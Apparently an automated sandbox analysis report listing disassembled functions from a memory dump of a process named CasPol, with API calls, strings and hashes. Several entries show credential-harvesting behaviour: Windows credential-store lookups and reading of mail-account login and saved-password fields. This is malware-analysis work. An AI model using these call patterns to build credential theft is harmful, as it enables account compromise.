                                                                                                                                                                                    Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 667451143-3916222277
                                                                                                                                                                                    • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                    • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                    Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                                                                                                    • API String ID: 3318079752-260894208
                                                                                                                                                                                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                    Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                    Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                    • API String ID: 2881943006-572158859
                                                                                                                                                                                    • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                    • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                    • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                    Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                    • API String ID: 888011440-2039793938
                                                                                                                                                                                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                    Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                    • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                    • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                    • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                    Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                    • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                    • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                    • String ID: 0wE$d
                                                                                                                                                                                    • API String ID: 2915808112-1552800882
                                                                                                                                                                                    • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                    • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                    Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                    Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                    Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                      • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                      • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2432066023-0
                                                                                                                                                                                    • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                    • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                    Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                    Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                                                                                                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                    Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                      • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2485852401-0
                                                                                                                                                                                    • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                    • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                    • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                    Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                    Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                    • Opcode ID: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                    • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                    • Opcode Fuzzy Hash: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                    Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
